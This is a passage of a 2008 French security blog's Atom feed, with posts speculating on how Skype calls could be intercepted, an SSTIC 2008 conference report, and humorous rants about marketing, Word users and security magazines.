href='http://www.blogger.com/feeds/16926911/posts/default/961333891401064903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/961333891401064903'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/08/marketing-fail.html' title='Marketing fail'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-8114709930322825813</id><published>2008-07-27T09:48:00.003+02:00</published><updated>2008-07-27T14:50:46.521+02:00</updated><title type='text'>Les backdoors dans Skype</title><content type='html'>Un &lt;a href="http://blogs.zdnet.com/security/?p=1549"&gt;récent article&lt;/a&gt; au titre racoleur prétend qu'il existe des &lt;span style="font-style: italic;"&gt;backdoors&lt;/span&gt; dans Skype, permettant aux forces de police d'écouter les conversations.&lt;br /&gt;&lt;br /&gt;Au delà du &lt;a href="http://fr.wikipedia.org/wiki/FUD"&gt;FUD&lt;/a&gt;, il me semble évident (compte-tenu des informations disponibles publiquement) qu'il est possible d'écouter une conversation Skype.&lt;br /&gt;&lt;br /&gt;Parmi les arguments qui plaident en faveur de cette hypothèse:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La présence de &lt;a href="http://secunia.com/search/?search=skype"&gt;failles&lt;/a&gt; exploitables à distance dans le logiciel. Dont &lt;a href="http://secunia.com/advisories/17305/"&gt;la nôtre&lt;/a&gt; :)&lt;/li&gt;&lt;/ul&gt;Ceci dit, même si les polices &lt;a href="http://fr.securityvibes.com/police-france-cheval-de-troie-espion-justice-piratage-article-878.html"&gt;française&lt;/a&gt; et allemande (entre autres) ont des velléités de "piratage légal", un ex-français travaillant dans la sécurité informatique offensive pourrait confirmer que les "services" sont encore loin du "remote 0day dans Skype" ...&lt;ul&gt;&lt;li&gt;Le mécanisme d'authentification, basé sur une signature RSA, repose sur le jeu de clés Skype.&lt;/li&gt;&lt;/ul&gt;Il a déjà été &lt;a href="http://eusecwest.com/esw06/esw06-raynal.pdf"&gt;démontré&lt;/a&gt; (cf. slides 101+) que le remplacement de ces clés dans un client Skype "malveillant" (par exemple, via la fonction de mise à jour automatique[*]) permettait de faire tourner un réseau totalement indépendant du réseau "officiel". Le point de connexion entre le réseau "officiel" et le réseau "parallèle" simule un client Skype et peut avoir accès à toutes les communications en clair (attaque en &lt;span style="font-style: italic;"&gt;homme du milieu&lt;/span&gt;).&lt;br /&gt;&lt;br /&gt;Bien entendu si Skype coopère en donnant accès à ses clés privées, c'est encore plus simple.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Le système de &lt;span style="font-style: italic;"&gt;&lt;a href="https://www.openrce.org/blog/view/276/Skype_fun"&gt;plugins&lt;/a&gt; &lt;/span&gt;permettant d'étendre les fonctionnalités du logiciel n'est pas sûr.&lt;/li&gt;&lt;/ul&gt;En effet, lors de l'ajout d'un nouveau &lt;span style="font-style: italic;"&gt;plugin&lt;/span&gt;, une confirmation utilisateur est demandée. Mais cette confirmation ne fait qu'ajouter une entrée dans la liste des &lt;span style="font-style: italic;"&gt;plugins&lt;/span&gt;, authentifiée par un "code de validation". Ce code n'est en aucun cas une signature, et n'importe qui connaissant l'algorithme peut le recalculer. Un &lt;span style="font-style: italic;"&gt;malware&lt;/span&gt; pourrait donc installer silencieusement un &lt;span style="font-style: italic;"&gt;plugin&lt;/span&gt; Skype.&lt;br /&gt;&lt;br /&gt;Compte-tenu des &lt;a href="http://actes.sstic.org/SSTIC08/Law_Enforcement_Forensics_Mobile_Communications/SSTIC08-article-Gratzer_Naccache-Law_Enforcement_Forensics_Mobile_Communications.pdf"&gt;conférences passées&lt;/a&gt; présentant les méthodes de travail de la police, la solution du piégeage semble être la plus couramment utilisée.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Enfin, de nombreux pays imposent aux opérateurs télécom la mise en place d'un mécanisme de &lt;a href="http://en.wikipedia.org/wiki/Lawful_interception"&gt;&lt;span style="font-style: italic;"&gt;Lawful Interception&lt;/span&gt;&lt;/a&gt;. On ne voit pas pourquoi une société américaine aussi importante (Skype est une société du groupe eBay) pourrait décider de se soustraire à cette obligation.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Maintenant chacun fait ce qu'il veut. Mais vous ne pourrez pas dire que vous ne saviez pas.&lt;br /&gt;&lt;br /&gt;La question qui reste en suspens est: y a-t-il une bonne vieille &lt;span style="font-style: italic;"&gt;backdoor&lt;/span&gt; dans Skype, permettant de prendre le contrôle de n'importe quel client à distance ? Un simple &lt;span style="font-style: italic;"&gt;netstat -an&lt;/span&gt; devrait permettre de répondre à cette question ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;[*] La fonction de mise à jour automatique est une simple connexion HTTP. Par exemple chez moi:&lt;br /&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span style="font-size:85%;"&gt;GET /ui/0/3.6.0.216/fr/getnewestversion?ver=3.6.0.216&amp;amp;uhash=1b37a59b72b99a9ff8158cb6e084efb86 HTTP/1.1&lt;br /&gt;User-Agent: Skype. 3.6&lt;br /&gt;Host: ui.skype.com&lt;br /&gt;Cache-Control: no-cache&lt;br /&gt;&lt;br /&gt;HTTP/1.1 200 OK&lt;br /&gt;Date: Sun, 27 Jul 2008 12:40:59 GMT&lt;br /&gt;Server: Apache&lt;br /&gt;Cache-control: no-cache, must revalidate&lt;br /&gt;Pragma: no-cache&lt;br /&gt;Expires: 0&lt;br /&gt;Set-Cookie: SC=CC=:CCY=:LC=fr:TM=1217162459:TS=1217162459:TZ=:VER=0/3.6.0.216/0; expires=Mon, 27-Jul-09 12:40:59 GMT; path=/; domain=.skype.com;&lt;br /&gt;Content-Length: 9&lt;br /&gt;Connection: close&lt;br /&gt;Content-Type: text/html; charset=utf-8&lt;br /&gt;Content-Language: en&lt;br /&gt;&lt;br /&gt;3.8.0.139&lt;/span&gt;                 &lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-8114709930322825813?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/8114709930322825813/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=8114709930322825813' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8114709930322825813'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8114709930322825813'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/07/les-backdoors-dans-skype.html' title='Les backdoors dans Skype'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-3012214135925937416</id><published>2008-07-14T22:00:00.000+02:00</published><updated>2008-07-14T22:09:22.802+02:00</updated><title type='text'>Il n'est toujours pas content</title><content type='html'>(Suite du message précédent, car j'ai oublié de citer quelques personnes qui me font rire - personnes morales, je vous rassure :)&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La &lt;span style="font-style: italic;"&gt;newsletter&lt;/span&gt; de mon opérateur mobile&lt;/li&gt;&lt;/ul&gt;Je me suis toujours demandé si les témoignages clients glissés dans les encarts publicitaires étaient totalement bidonnés (texte &lt;span style="font-style: italic;"&gt;et&lt;/span&gt; photo), ou juste un peu. Vous voyez de quoi je veux parler : les encarts dans lesquels Michel H., 52 ans, cadre en région parisienne, se dit "accro de la 3G" par exemple.&lt;br /&gt;&lt;br /&gt;Mon opérateur mobile fait la même chose, mais avec des stars. Ce mois-ci c'est Zazie qui s'y colle. Et je ne sais pas si c'est le service com' qui a écrit l'interview, mais en tout cas quelqu'un s'est bien raté.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/lol-tel.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/lol-tel.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La &lt;span style="font-style: italic;"&gt;newsletter&lt;/span&gt; de ma banque&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Echec également. Il s'agissait de promouvoir la banque par téléphone portable.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/lol-bank.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/lol-bank.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Les utilisateurs de Word&lt;/li&gt;&lt;/ul&gt;Oui les utilisateurs de Word m'exaspèrent ! Enfin les 98%[*] d'utilisateurs (ça ne vous concerne donc peut-être pas, cher lecteur :) qui se sont retrouvés avec le pack Office installé sur leur PC acheté en grande surface, et qui ont grossi la base des "utilisateurs de Word".&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;[*] Chiffre approximatif&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Le drame, c'est qu'un document Word d'une certaine taille (pas celle d'un CV, mais celle d'un document d'analyse de risques par exemple) sans numérotation automatique, sans styles prédéfinis, sans signets et références, et autres fonctions clés du logiciel c'est juste ... impossible à modifier.&lt;br /&gt;&lt;br /&gt;Au moins avec \LaTeX, on peut être sûr que tout utilisateur ne l'est pas devenu par hasard ... (je vous rassure, un document \LaTeX est également impossible à modifier si on ne dispose pas de tous les paquets installés sur le poste de l'utilisateur qui a compilé le document en dernier).&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Le dernier &lt;a href="http://hakin9.org/"&gt;Hakin9&lt;/a&gt; sur le thème "Data Recovery"&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Non en fait il n'est pas mal :) Il y a quelques articles qui tiennent tout à fait la route.&lt;br /&gt;&lt;br /&gt;Il n'y a que deux problèmes avec ce magazine : quand ils font appel à des étudiants pour boucler, ou quand ils font appel à des étudiants pour traduire.&lt;br /&gt;&lt;br /&gt;Dans le premier cas, ça donne des choses comme "si comme moi vous avez perdu votre table de partitions un matin en vous réveillant, vous pouvez utiliser FileRecovery Pro ou &lt;a href="http://www.cgsecurity.org/wiki/TestDisk"&gt;TestDisk&lt;/a&gt; pour récupérer vos fichiers". Sachant que le premier est un outil Windows coûtant au bas mot $100, et que le deuxième est inutilisable si &lt;a href="http://www.opengroup.org/onlinepubs/007908799/xcurses/intovix.html"&gt;Curses&lt;/a&gt; n'évoque pour vous qu'un sort niveau 4 à &lt;a href="http://fr.wikipedia.org/wiki/Eye_of_the_Beholder_%28jeu_vid%C3%A9o%29"&gt;Eye of the Beholder&lt;/a&gt;. Aucune explication sur les principes, même généraux, de la récupération de données. Une introduction "I love Linux", suivie d'une liste de produits sous Windows. Au final, un article qui sera périmé dès que les logiciels cités auront changé de version.&lt;br /&gt;&lt;br /&gt;(A titre personnel je recommande vivement TestDisk et PhotoRec, qui m'ont sauvé la vie plusieurs fois).&lt;br /&gt;&lt;br /&gt;Dans le deuxième cas, ça donne des choses comme (je cite mot pour mot) :&lt;br /&gt;&lt;blockquote&gt;"LDAP est un protocole qui peut être supporté par différentes technologies, telles que XML ou les bases de données traditionnelles."&lt;/blockquote&gt;Ou :&lt;br /&gt;&lt;blockquote&gt;"[...] d'énormes &lt;span style="font-style: italic;"&gt;rainbow tables&lt;/span&gt; qui peuvent être mis à mal avec des technologies de type torrent."&lt;/blockquote&gt;Quoique dans certains cas, on se demande si l'erreur est réellement imputable au traducteur ...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-3012214135925937416?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/3012214135925937416/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=3012214135925937416' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3012214135925937416'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3012214135925937416'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/07/il-nest-toujours-pas-content.html' title='Il n&apos;est toujours pas content'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-2766026528779926179</id><published>2008-07-12T13:53:00.003+02:00</published><updated>2008-07-12T14:17:27.536+02:00</updated><title type='text'>Il revient ... et il n'est pas content !</title><content type='html'>Et oui je suis de retour après pas mal d'activités diverses. Mais j'ai aussi eu le temps de m'énerver sur l'actualité récente.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La "faille" DNS&lt;/li&gt;&lt;/ul&gt;Je ne m'avancerai pas sur le fait de savoir si Dan Kaminsky a trouvé une faille sérieuse dans le protocole DNS ou l'une de ses utilisations (contrairement à d'autres [&lt;a href="http://expertmiami.blogspot.com/2008/07/dns.html"&gt;1&lt;/a&gt;][&lt;a href="http://sid.rstack.org/blog/index.php/283-dns-dns-dns"&gt;2&lt;/a&gt;]). Mais en lisant les blogs, il est amusant de constater que tout le monde prétend avoir trouvé cette faille (&lt;a href="http://cr.yp.to/djbdns/dns_random.html"&gt;D.J.Bernstein&lt;/a&gt;, &lt;a href="http://www.trusteer.com/files/BIND_9_DNS_Cache_Poisoning.pdf"&gt;Amit Klein&lt;/a&gt;, et même un stagiaire du &lt;a href="http://isc.sans.org/diary.html?storyid=4693"&gt;SANS&lt;/a&gt;) ... alors qu'on ne sait même pas encore de quoi il s'agit !&lt;br /&gt;&lt;br /&gt;Been there, done that.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La "qualité" de l'Open Source&lt;/li&gt;&lt;/ul&gt;Ou comment laisser un bug &lt;a href="http://www.computerworld.com/action/article.do?command=viewArticleBasic&amp;amp;articleId=9108978"&gt;33 ans&lt;/a&gt; dans un logiciel que tout le monde a utilisé au moins une fois (ne serait-ce qu'à l'école), à savoir YACC.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Le dernier MISC&lt;/li&gt;&lt;/ul&gt;Un bon opus, même si la virologie reste un sujet de laboratoire, assez loin des préoccupations actuelles des RSSI. Du coup la diversité des auteurs s'en ressent. Notez bien qu'on pourrait dire la même chose du dernier SSTIC. Mais je ne l'ai pas dit :)&lt;br /&gt;&lt;br /&gt;Il faudra quand même que je me fasse confirmer (ou infirmer) que la traduction de l'anglais &lt;span style="font-style: italic;"&gt;malicious&lt;/span&gt; est "malveillant", et non pas "malicieux". En tout cas d'après Google Translate.&lt;br /&gt;&lt;br /&gt;Ceci dit, je n'ai jamais compris non plus la différence entre une "problématique" et un "problème", entre "un écart qui nécessite des mesures correctives rapides" et "un projet complètement planté", et toutes ces subtilités de la Novlangue.&lt;br /&gt;&lt;br /&gt;Je réserve mon avis sur Hakin9 pour plus tard (je ne l'ai pas encore ouvert).&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Les Call Centers&lt;/li&gt;&lt;/ul&gt;En complément à la technique du &lt;a href="http://news0ft.blogspot.com/2008/04/de-lutilisation-intelligente-du-grey.html"&gt;Grey Listing&lt;/a&gt;, la technique de l'Early Abort : si au bout de 3 secondes votre interlocuteur n'a pas dit "allo" et que vous n'entendez qu'un bruit de fond continu, RACCROCHEZ C'EST UN PIEGE ! En effet la numérotation dans les Call Centers est automatique ; lorsque la ligne décroche l'appel est transféré vers un télévendeur - ce qui induit un &lt;span style="font-style: italic;"&gt;lag&lt;/span&gt; (perceptible) de 3-4 secondes.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La sécurité des présidents&lt;/li&gt;&lt;/ul&gt;Et oui c'est le sommet de l'Union pour la Méditérannée ce week-end. 18,000 policiers sont mobilisés. Et j'ai pris 2 PV de stationnement en 1h30. A ce prix là les terroristes vont avoir du mal à garer une voiture piégée s'ils n'ont pas pris le stationnement résidentiel !&lt;br /&gt;&lt;br /&gt;Vive le mois d'août et sa gratuité ...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-2766026528779926179?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/2766026528779926179/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=2766026528779926179' title='5 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2766026528779926179'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2766026528779926179'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/07/il-revient-et-il-nest-pas-content.html' title='Il revient ... et il n&apos;est pas content !'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-5714414377020630790</id><published>2008-07-04T13:51:00.002+02:00</published><updated>2008-07-04T13:54:54.611+02:00</updated><title type='text'>Appel à témoins</title><content type='html'>Désolé pour le manque d'activité sur ce blog, j'essaie de préparer des articles plus techniques que d'habitude mais c'est beaucoup plus long (mes stagiaires en savent quelquechose :).&lt;br /&gt;&lt;br /&gt;L'objet initial de ce billet est le suivant : "j'ai un ami qui cherche des traces PCAP de communications WiFi enregistrées entre septembre 2006 et mai 2008, particulièrement lors de conférences de sécurité type &lt;a href="http://www.sstic.org/"&gt;SSTIC&lt;/a&gt;".&lt;br /&gt;&lt;br /&gt;Si vous avez ça sous la main, vous pouvez me contacter par un commentaire.&lt;br /&gt;&lt;br /&gt;Le plus strict anonymat sera respecté :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-5714414377020630790?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/5714414377020630790/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=5714414377020630790' title='6 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5714414377020630790'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5714414377020630790'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/07/appel-tmoins.html' title='Appel à témoins'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-4090323619944981433</id><published>2008-06-09T07:01:00.003+02:00</published><updated>2008-06-09T07:38:21.541+02:00</updated><title type='text'>YACRS'08</title><content type='html'>Et oui, &lt;span style="font-style: italic;"&gt;Yet Another Compte-Rendu du SSTIC 2008 &lt;/span&gt;...&lt;br /&gt;&lt;br /&gt;Je ne vais pas vous embêter avec le contenu des &lt;a href="http://www.sstic.org/SSTIC08/programme.do"&gt;confs&lt;/a&gt;, vu le nombre de billets traitant déjà du sujet (certains inaugurant le &lt;a href="http://sid.rstack.org/blog/index.php/279-le-sstic-2008-en-live"&gt;&lt;span style="font-style: italic;"&gt;live blogging&lt;/span&gt;&lt;/a&gt;). On notera que &lt;a href="http://petaramesh.org/post/2006/09/26/416-de-bisvnvrs-illvstribvs-orbis-blogospherae"&gt;l'effet bisounours&lt;/a&gt; joue à fond, difficile de trouver un billet descendant complètement une conf', comme ce fût le cas les années passées.&lt;br /&gt;&lt;br /&gt;Parlons plutôt de l'esprit général de SSTIC, car comme dirait l'autre, "&lt;a href="http://www.sstic-canalhistorique.org/"&gt;c'était mieux avant&lt;/a&gt;".&lt;br /&gt;&lt;br /&gt;Une chose frappante, qui s'est transformée en blague récurrente, c'est l'absence de publication d'outils cette année. La peur du gendarme est-elle passée par là ? Il est vrai qu'ils étaient nombreux dans la salle, et a priori &lt;a href="http://www.sstic.org/SSTIC08/programme.do#DUVINAGE"&gt;très compétents&lt;/a&gt; ...&lt;br /&gt;&lt;br /&gt;A SSTIC, on trouvait habituellement deux types de conférences :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Les conférences de culture générale, sur des sujets obscurs et/ou non techniques. Cette année on pourra citer la sécurité des détecteurs de feux de forêt, ou les attaques informationnelles.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Les conférences techniques, sur des sujets pointus, que l'orateur est souvent le seul à avoir travaillé aussi profondément, et qui débouchent sur des découvertes ou des outils puissants. Dans le passé, il y a eu la conférence de Nicolas Pouvesle sur les &lt;a href="http://actes.sstic.org/SSTIC06/Dissection_RPC_Windows/"&gt;RPC Windows&lt;/a&gt;, ou la conférence d'Aurélien Bordes sur &lt;a href="http://actes.sstic.org/SSTIC07/Authentification_Windows/"&gt;l'authentification Windows&lt;/a&gt;.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Cette année, une troisième race de conférence s'est taillée la part du lion : la conférence technique, sur un sujet déjà largement connu, et dont les seules avancées (en général un outil puissant) ne sont pas destinées à être publiées. Et personnellement, je ne vois pas trop l'intérêt de jouer au meilleur &lt;span style="font-style: italic;"&gt;debugger&lt;/span&gt; ou à la meilleure &lt;span style="font-style: italic;"&gt;libdisasm&lt;/span&gt; ...&lt;br /&gt;&lt;br /&gt;Je passe sur l'intervention de la DCSSI à propos de la SSI en France. Chaque planche était un troll, pour ainsi dire ...&lt;br /&gt;&lt;br /&gt;Sinon en vrac :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Les treillis n'étaient pas très visibles cette année.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;D'ailleurs on sent que le public a changé, car poser des questions semble être devenu un motif d'opprobre. Même Hervé s'est tenu à carreau devant Marcus.&lt;/li&gt;&lt;li&gt;La jeune génération arrive. Ca se voit dans les greet'z et dans les Chocapic'z.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://news0ft.blogspot.com/2008/03/ceci-nest-pas-une-bche-gratuite.html"&gt;L'Asus EEE 700&lt;/a&gt; a bien marché en France. Vraiment.&lt;/li&gt;&lt;li&gt;mDNS, c'est pire que NetBIOS. Vraiment.&lt;/li&gt;&lt;li&gt;Mention spéciale à Nikoteen, le seul à avoir publié ses travaux sous licence 4.&lt;/li&gt;&lt;/ul&gt;En conclusion, je ne regrette jamais d'être allé au SSTIC car il y a des moments épiques (souvent nocturnes). Mais je ne reviens pas voir mon patron ce lundi matin avec beaucoup de choses à lui montrer ... Espérons qu'il me rembourse quand même le voyage !&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;PS. Ces propos sont librement diffusables sous licence LDP :)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-4090323619944981433?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/4090323619944981433/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=4090323619944981433' title='13 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4090323619944981433'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4090323619944981433'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/06/yacrs08.html' title='YACRS&apos;08'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1849470623391854737</id><published>2008-05-31T21:47:00.002+02:00</published><updated>2008-05-31T22:21:03.186+02:00</updated><title type='text'>Pot pourri</title><content type='html'>La semaine dernière a été chargée, pour cause d'audit. Encore un grand moment de bonheur, dont je réserve les meilleures feuilles aux amateurs de cocktails de fruits (que mon chef soit rassuré s'il me lit, aucun secret professionnel n'est trahi à cette occasion ;).&lt;br /&gt;&lt;br /&gt;Comme je ne peux rien raconter de mes activités (contrairement à &lt;a href="http://securite.reseaux-telecoms.net/actualites/lire-six-heures-pour-passer-les-defenses-du-fbi-et-autres-aventures-18248.html"&gt;d'autres&lt;/a&gt;), je vais me contenter de ce que je fais le mieux, à savoir bâcher :)&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Tout d'abord le compte-rendu de la &lt;a href="http://www.guwiv.com/portal/blogs/news/archive/2008/05/28/26-mai-journ-233-e-windows-le-bilan.aspx"&gt;journée Vista&lt;/a&gt; du &lt;a href="http://www.guwiv.com/"&gt;GuWiV&lt;/a&gt; m'a mis en joie : &lt;span style="font-style: italic;"&gt;[...] Les "retours vers XP" représentent une frange infime des utilisateurs et relève plus du buzz geeko-journalistique que d'une réalité de terrain. [...]&lt;/span&gt;&lt;/li&gt;&lt;li&gt;Toujours dans ce même compte-rendu, je tombe sur le &lt;a href="http://giraudyp.perso.cegetel.net/"&gt;site&lt;/a&gt; d'un participant émérite du groupe SharePoint France. Très Web 2.0 &lt;span style="font-style: italic;"&gt;isn't it&lt;/span&gt; ?&lt;/li&gt;&lt;li&gt;Saviez-vous qu'il existe mieux que la "fameuse" norme ISO 27001 ? Je veux parler de &lt;a href="http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber=45170"&gt;ISO 29147&lt;/a&gt;, la norme du ... &lt;span style="font-style: italic;"&gt;responsible disclosure&lt;/span&gt;. On s'inscrit où pour être certifié ?&lt;/li&gt;&lt;li&gt;Voici quelques sociétés dont je peux librement parler, puisqu'elles m'ont envoyé un authentique &lt;span style="font-style: italic;"&gt;spam&lt;/span&gt;. La première c'est Ergonomiko : franchement, vous trouvez &lt;a href="http://www.tpconnexion.com/ergonomiko/_02_ergo.html#site"&gt;leur site&lt;/a&gt; ergonomique ? La deuxième (dont je tairai le nom) propose une sensibilisation à la sécurité en ligne : &lt;a href="http://www.secureman.com/"&gt;SecureMan&lt;/a&gt;.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Pour ceux qui ont déjà entendu parlé de &lt;a href="http://www.microsoft.com/windows/products/winfamily/windowshomeserver/default.mspx"&gt;Windows Home Server&lt;/a&gt; (tout un concept), sachez que le système est totalement inutilisable si vous avez &lt;a href="http://support.microsoft.com/kb/946676/en-us"&gt;plus d'un disque dur&lt;/a&gt;. Le tout à cause de la gestion des &lt;a href="http://support.microsoft.com/kb/943393/en-us"&gt;&lt;span style="font-style: italic;"&gt;Alternate Data Streams&lt;/span&gt;&lt;/a&gt; (comme quoi ça sert à quelque chose cette &lt;span style="font-style: italic;"&gt;feature&lt;/span&gt; !). Il faut attendre le Power Pack 1 (sans rire).&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;Passons maintenant à mon sujet favori : les conférences de sécurité. La semaine prochaine vous aurez le choix entre &lt;a href="http://www.sstic.org/SSTIC08/info.do"&gt;SSTIC'08&lt;/a&gt; et des &lt;a href="http://technet.microsoft.com/fr-fr/bb498011.aspx"&gt;séminaires Technet&lt;/a&gt;. Personnellement je me rends à SSTIC, car on m'a vendu ça :&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.sonyericsson.com/developerimages/javaone08_rsakaguchi_keynot.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://www.sonyericsson.com/developerimages/javaone08_rsakaguchi_keynot.gif" alt="" border="0" /&gt;&lt;/a&gt;Par la suite, un complice interne m'a signalé qu'on aurait plutôt son voisin sur les genoux cette année ...&lt;br /&gt;&lt;br /&gt;Si vous avez encore le courage après ça, vous pouvez rempiler sur la &lt;a href="http://www.nuitduhack.com/index.php"&gt;Nuit du Hack&lt;/a&gt; (14/15 juin) puis &lt;a href="http://www.hackerspace.net/"&gt;HackerSpaceFest&lt;/a&gt; (16/22 juin). Ca fera quelques Miles en plus sur le passe Navigo ... ou pas.&lt;br /&gt;&lt;br /&gt;PS. Inutile de me harceler par mail, le forum de "&lt;a href="http://www.01net.com/editorial/381450/vingt-deux-jeunes-pirates-arretes-pour-vandalisme-et-escroquerie/"&gt;hackers&lt;/a&gt;" fermé par la police cette semaine, c'est &lt;a href="http://security.forum-actif.net/index.htm"&gt;celui-là&lt;/a&gt; (source: 